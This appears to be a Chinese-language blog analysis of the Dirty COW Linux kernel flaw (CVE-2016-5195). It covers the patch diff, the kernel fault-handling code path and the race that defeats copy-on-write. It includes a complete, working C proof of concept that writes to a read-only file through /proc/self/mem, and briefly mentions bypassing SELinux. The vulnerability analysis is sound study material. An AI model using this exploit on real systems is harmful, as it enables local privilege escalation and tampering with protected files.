CVE-2016-5195

你们这些人啊,每年年底都想搞个大新闻。。。

Linux内核 >= 2.6.22(2007年发行)以后的版本都受到影响,同时影响到android系统。

Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。

这个洞涉及到的东西比较多,包括了缺页中断处理,写时拷贝(Copy-on-Write,COW),竞态条件,页式内存管理等,要看的东西还很多。

针对android做一个简单的流程分析。

补丁

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+ return pte_write(pte) ||
+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
@@ -95,7 +105,7 @@ retry:
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
- if ((flags & FOLL_WRITE) && !pte_write(pte)) {
+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
@@ -412,7 +422,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
* reCOWed by userspace write).
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
- *flags &= ~FOLL_WRITE;
+ *flags |= FOLL_COW;
return 0;
}

补丁函数follow_page_pte,对应android中函数为follow_page
通过引用找到该函数的调用来源:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

follow_page <-
__get_user_pages <-
get_user_pages <-
__access_remote_vm <-
access_remote_vm <-
mem_rw <-
mem_write <-
proc_mem_operations

static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};

该结构位于fs/proc/base.c中,为/proc/<pid>/mem读写等操作的ops。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <sys/stat.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{

char *str;
str = (char*) arg;
int i, c = 0;

for(i = 0; i < 100000000; i++)
{
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{

char *str;
str = (char*)arg;
int f = open("/proc/self/mem", O_RDWR);
int i, c = 0;
for(i = 0; i < 100000000; i++) {
lseek(f, (unsigned long)map, SEEK_SET);
c += write(f, str, strlen(str));
}
printf("procselfmem %d\n\n", c);
}

int main(int argc,char *argv[])
{

if (argc < 3)
return 1;

pthread_t pth1,pth2;

f = open(argv[1], O_RDONLY);
fstat(f, &st);
name = argv[1];
map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
printf("mmap %p\n\n", map);

pthread_create(&pth1, NULL, madviseThread, argv[1]);
pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
return 0;
}

线程2(procselfmemThread):
线程循环调用write向mmap的文件数据进行写操作,由于mmap的映射文件flag为MAP_PRIVATE,所以写入操作会产生一个映射区的复制(copy-on-write),从而保证对此区域所有的修改不会写回原文件。
结合前边的漏洞触发逻辑,该线程通过某种方式触发了漏洞,使得写入操作直接影响了原始数据。

线程1(madviseThread):
循环调用madvise函数,madvice(caddr_t addr, size_t len, int advice),该函数说明如下(引自网络):
这个函数的主要用处是告诉内核内存addr~addr+len在接下来的使用状况,以便内核进行一些进一步的内存管理操作。当advice为MADV_DONTNEED时,此系统调用相当于通知内核addr~addr+len的内存在接下来不再使用,内核将释放掉这一块内存以节省空间,相应的页表项也会被置空。

漏洞逻辑

write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)

{

return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)

{

...
this_len = access_remote_vm(mm, addr, page, this_len, write);
...
}

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)

{

return __access_remote_vm(NULL, mm, addr, buf, len, write);
}


static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
...
ret = get_user_pages(tsk, mm, addr, 1, write, 1, &page, &vma);
...
if (write) { // write = 1
copy_to_user_page(vma, page, addr, maddr + offset, buf, bytes); // memcpy拷贝数据
set_page_dirty_lock(page); // Dirty a page, CPU在写操作的时候,会置位PTE_DIRTY,说明对应的页被写过,是脏的.
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
...
}

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, int nr_pages, int write, int force,
struct page **pages, struct vm_area_struct **vmas)

{

int flags = FOLL_TOUCH;
if (pages)
flags |= FOLL_GET;
if (write) // write = 1
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;

return __get_user_pages(tsk, mm, start, nr_pages, flags, pages, vmas,
NULL);
}


/**
* __get_user_pages() - pin user pages in memory
* ...
* __get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
*/

int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, int nr_pages, unsigned int gup_flags,
struct page **pages, struct vm_area_struct **vmas,
int *nonblocking)
{
...
// vm_flags = (VM_WRITE | VM_MAYWRITE)
vm_flags = (gup_flags & FOLL_WRITE) ?
(VM_WRITE | VM_MAYWRITE) : (VM_READ | VM_MAYREAD);
// vm_flags = VM_WRITE
vm_flags &= (gup_flags & FOLL_FORCE) ?
(VM_MAYREAD | VM_MAYWRITE) : (VM_READ | VM_WRITE);
...
do {
...
do {
...
while (!(page = follow_page(vma, start, foll_flags))) { // 获取页表项
int ret;
unsigned int fault_flags = 0;
...
// 3. pass
if (foll_flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
...
ret = handle_mm_fault(mm, vma, start, fault_flags); // 获取失败时会调用这个函数
...
// 如果是因为映射没有写权限导致的获取页表项失败,去掉flags中的FOLL_WRITE标记,从而使的获取页表项不再要求内存映射具有写的权限。
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
foll_flags &= ~FOLL_WRITE;
...
}

这个while循环将是触发漏洞的逻辑。

follow_page

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/**
* follow_page - look up a page descriptor from a user-virtual address
* Returns the mapped (struct page *), %NULL if no mapping exists, or
* an error pointer if there is a mapping to something not represented
* by a page descriptor (see also vm_normal_page()).
*
* 根据虚拟地址获取内核内存页, 如果没有映射的内核内存页时,返回NULL
*/


struct page *follow_page(struct vm_area_struct *vma, unsigned long address,
unsigned int flags)

{

...

// 这里判断页表项是否有效。
// 当页完全不在内存中时,页表项也没有效。
if (!pte_present(pte)) // 1. 3.
goto no_page;

// 希望搜索一个可写的页面,但是页表项没有写权限。
if ((flags & FOLL_WRITE) && !pte_write(pte)) // 2.
goto unlock;

// 根据pte中保存的页帧号,找到该页帧号对应的page结构。
page = vm_normal_page(vma, address, pte); // 4.
...
unlock:
pte_unmap_unlock(ptep, ptl);
out:
return page;
...
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return page;
...
}

handle_mm_fault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211

/*
* handle_mm_fault( ) function is invoked to allocate a new page frame
* 分配一个新的页框
*/


int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)

{

...
return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}

int handle_pte_fault(struct mm_struct *mm,
struct vm_area_struct *vma, unsigned long address,
pte_t *pte, pmd_t *pmd, unsigned int flags)

{

pte_t entry;
spinlock_t *ptl;
entry = *pte;
if (!pte_present(entry)) { // 如果页不在主存中
if (pte_none(entry)) { // 页表项内容为0,表明进程未访问过该页
if (vma->vm_ops) { // 如果vm_ops字段和fault字段都不为空,则说明这是一个基于文件的映射
if (likely(vma->vm_ops->fault))
return do_linear_fault(mm, vma, address,
pte, pmd, flags, entry);
}
// 否则分配匿名页
return do_anonymous_page(mm, vma, address, pte, pmd, flags);
}
// 属于非线性文件映射且已被换出
if (pte_file(entry))
return do_nonlinear_fault(mm, vma, address,
pte, pmd, flags, entry);

// 页不在主存中,但是页表项保存了相关信息,则表明该页被内核换出,则要进行换入操作
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
goto unlock;
if (flags & FAULT_FLAG_WRITE) { //异常由写访问触发,follow_page后会设置该flag
if (!pte_write(entry)) // 对应的页是不可写的
return do_wp_page(mm, vma, address, pte, pmd, ptl, entry); // 此时必须进行写时复制的操作,以后再访问这块虚拟地址,就访问的是原数据的拷贝了。

entry = pte_mkdirty(entry);
}
// 不进行写时复制
entry = pte_mkyoung(entry);
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte);
}
...
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
}

// do_linear_fault -> __do_fault vma -> vm_ops->fault -> filemap_fault -> return ret | VM_FAULT_LOCKED。
static int do_linear_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
unsigned int flags, pte_t orig_pte)

{

pgoff_t pgoff = (((address & PAGE_MASK)
- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
// 如果page_table之前用来建立了临时内核映射,则释放该映射
pte_unmap(page_table);
return __do_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}

static int __do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
...

// 调用定义好的fault函数,分配一个新页面 ,确保将所需的文件数据读入到映射页
ret = vma->vm_ops->fault(vma, &vmf);
...
// 1. cow, 3. pass
if (flags & FAULT_FLAG_WRITE) { // 写访问
if (!(vma->vm_flags & VM_SHARED)) { // 私有映射,此空间是MAP_PRIVATE标志, 则要创建一个副本进行写时复制
page = cow_page;
anon = 1; // 标记为一个匿名映射
copy_user_highpage(page, vmf.page, address, vma); // 创建新页
__SetPageUptodate(page);
} else {
...
//
if (likely(pte_same(*page_table, orig_pte))) {
flush_icache_page(vma, page);
entry = mk_pte(page, vma->vm_page_prot); // 按新页生成pte entry
// 3. pass
if (flags & FAULT_FLAG_WRITE) // 将此页置可写,以避免其他路径也触发COW
entry = maybe_mkwrite(pte_mkdirty(entry), vma);
...
set_pte_at(mm, address, page_table, entry); // 设置到页表
...
}

static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
{

if (likely(vma->vm_flags & VM_WRITE))
pte = pte_mkwrite(pte);
return pte;
}

// ext4中定义的缺页异常处理函数
static const struct vm_operations_struct ext4_file_vm_ops = {
.fault = filemap_fault,
.page_mkwrite = ext4_page_mkwrite,
};

/**
* filemap_fault - read in file data for page fault handling
* ...
* filemap_fault() is invoked via the vma operations vector for a
* mapped memory region to read in file data during a page fault.
* ...
*/


int filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{

...

// 这个函数做的第一件事情就是检查要访问的地址偏移(相对于文件的)是否超过了文件大小,
// 如果超过就返回VM_FAULT_SIGBUS,这将导致SIGBUS信号被发送给进程。
size = (i_size_read(inode) + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT;
if (offset >= size)
return VM_FAULT_SIGBUS;

// 通过find_get_page()速查一个文件地址(inode)在文件缓存中的页。
page = find_get_page(mapping, offset);
...
vmf->page = page;
return ret | VM_FAULT_LOCKED;
...
}

static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
spinlock_t *ptl, pte_t orig_pte)

__releases(ptl)
{

...
/*
// 获取共享页
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) { //获取共享页失败
// 如果vma的映射本来就是共享且可写的,则跳转至reuse直接使用orig_pte对应的页
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
goto reuse;
// 否则跳转至gotten分配一个页
goto gotten;
}
*/

// 2.
if (PageAnon(old_page) && !PageKsm(old_page)) {
...
// 内核通过检查,发现COW操作已经在缺页处理时完成了,所以不再进行COW,而是直接利用之前COW得到的页表项
if (reuse_swap_page(old_page)) {
/*
* The page is all ours. Move it to our anon_vma so
* the rmap code will not search our parent or siblings.
* Protected against the rmap code by the page lock.
*/

page_move_anon_rmap(old_page, vma, address);
unlock_page(old_page);
goto reuse;
}
}
...
reuse:
flush_cache_page(vma, address, pte_pfn(orig_pte));
entry = pte_mkyoung(orig_pte);
entry = maybe_mkwrite(pte_mkdirty(entry), vma); // mark the page dirty
if (ptep_set_access_flags(vma, address, page_table, entry,1))
update_mmu_cache(vma, address, page_table);
pte_unmap_unlock(page_table, ptl);
ret |= VM_FAULT_WRITE;
...
return ret;
/*
gotten:
pte_unmap_unlock(page_table, ptl);

if (unlikely(anon_vma_prepare(vma)))
goto oom;

if (is_zero_pfn(pte_pfn(orig_pte))) { // 分配一个零页面
new_page = alloc_zeroed_user_highpage_movable(vma, address);
if (!new_page)
goto oom;
} else {
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); //分配一个非零页面
if (!new_page)
goto oom;
cow_user_page(new_page, old_page, address, vma); //将old_page中的数据拷贝到new_page
}
...
new_page = old_page;
ret |= VM_FAULT_WRITE;
}
return ret;
*/

...
}

触发逻辑

__get_user_pages中while循环触发漏洞,总共四个循环调用流程如下:

1.

1
2
3
4
5
6
7
8
9
10
11
follow_page() // 满足(!pte_present(pte)) && (!pte_none(pte)) 返回NULL
进入循环:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // 满足(!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops)
-> do_linear_fault
-> __do_fault
-> vma->vm_ops->fault(vma, &vmf) // filemap_fault() return VM_FAULT_LOCKED
-> copy_user_highpage // cow
-> maybe_mkwrite(pte_mkdirty(entry), vma) // mark the page dirty, RO
return VM_FAULT_LOCKED

2.

1
2
3
4
5
6
7
8
9
10
follow_page() // 满足((flags & FOLL_WRITE) && !pte_write(pte)) 返回NULL
进入循环:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // 满足(flags & FAULT_FLAG_WRITE) && (!pte_write(entry))
-> do_wp_page()
-> PageAnon() // this is CoWed page already
-> reuse_swap_page(old_page)
-> maybe_mkwrite(pte_mkdirty(entry), vma) // mark the page dirty, RO again
return VM_FAULT_WRITE

满足 ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))则去掉FOLL_WRITE标志

3.
get_user_pages第三次调用follow_page进行寻页,如果这时Thread2通过madvise(map, DONT_NEED)通知内核map在接下来不会被使用,内核会将map所在页释放,这样在寻页的时候就会引发pagefault,
此时的FOLL_WRITE已被置为0,fault_flags也不再拥有FAULT_FLAG_WRITE标志,
也就是在寻页的时候不再需要页具有写权限,所以不会产生COW。

1
2
3
4
5
6
7
8
9
10
11
cond_resched -> different thread will now unmap via madvise
follow_page() // 满足(!pte_present(pte)) && (!pte_none(pte)) 返回NULL
进入循环:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // 满足(!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops)
-> do_linear_fault
-> __do_fault
-> vma->vm_ops->fault(vma, &vmf) // filemap_fault() return VM_FAULT_LOCKED
-> // pass copy_user_highpage // cow
-> mk_pte(page, vma->vm_page_prot);

4.
第四次调用follow_page进行寻页的话,会成功返回对应的页表项,
接下来的写入操作会被同步到只读的文件中,从而造成了越权写。

1
2
3
4
follow_page()
-> (!pte_present(pte)) // pass
-> ((flags & FOLL_WRITE) && !pte_write(pte)) // has delete FOLL_WRITE flag, pass
-> page = vm_normal_page(vma, address, pte); // return page;

四个循环伪代码表示为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
/**
* 1.
* follow_page 满足(!pte_present(pte)) && (!pte_none(pte)),返回NULL,进入循环
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// handle_pte_fault 满足(!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops)
handle_pte_fault()
{
if ((!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops))
{ do_linear_fault()
{
__do_fault()
{
// call filemap_fault() return ret | VM_FAULT_LOCKED
ret = vma->vm_ops->fault(vma, &vmf);
// cow
copy_user_highpage();
// mark the page dirty, RO
maybe_mkwrite(pte_mkdirty(entry), vma)
// VM_FAULT_LOCKED
return ret;
}
}
}
}
}
}
}

/**
* 2.
* follow_page 满足((flags & FOLL_WRITE) && !pte_write(pte)) 返回NULL,进入循环
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// 满足(flags & FAULT_FLAG_WRITE) && (!pte_write(entry))
handle_pte_fault()
{
do_wp_page()
{
// this is CoWed page already
if (PageAnon())
{
reuse_swap_page(old_page);
}
// mark the page dirty, RO again
maybe_mkwrite(pte_mkdirty(entry), vma);
return ret | VM_FAULT_WRITE
}
}
}
}

if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
{
foll_flags &= ~FOLL_WRITE;
}
}

/**
* 3.
* cond_resched -> different thread will now unmap via madvise
* follow_page 满足(!pte_present(pte)) && (!pte_none(pte)) 返回NULL,进入循环
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// 满足(!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops)
handle_pte_fault()
{
do_linear_fault()
{
__do_fault()
{
// filemap_fault() return VM_FAULT_LOCKED
vma->vm_ops->fault(vma, &vmf);
// pass cow: copy_user_highpage
mk_pte(page, vma->vm_page_prot);
}
}
}
}
}

}

/**
* 4.
*/

follow_page()
{
// pass
if (!pte_present(pte))
{
return NULL;
}
// has delete FOLL_WRITE flag, pass
if (((flags & FOLL_WRITE) && !pte_write(pte)))
{
return NULL;
}
// return page;
page = vm_normal_page(vma, address, pte);
return page;
}

利用

  1. dirtycow.github.io
  2. 先绕过selinux吧。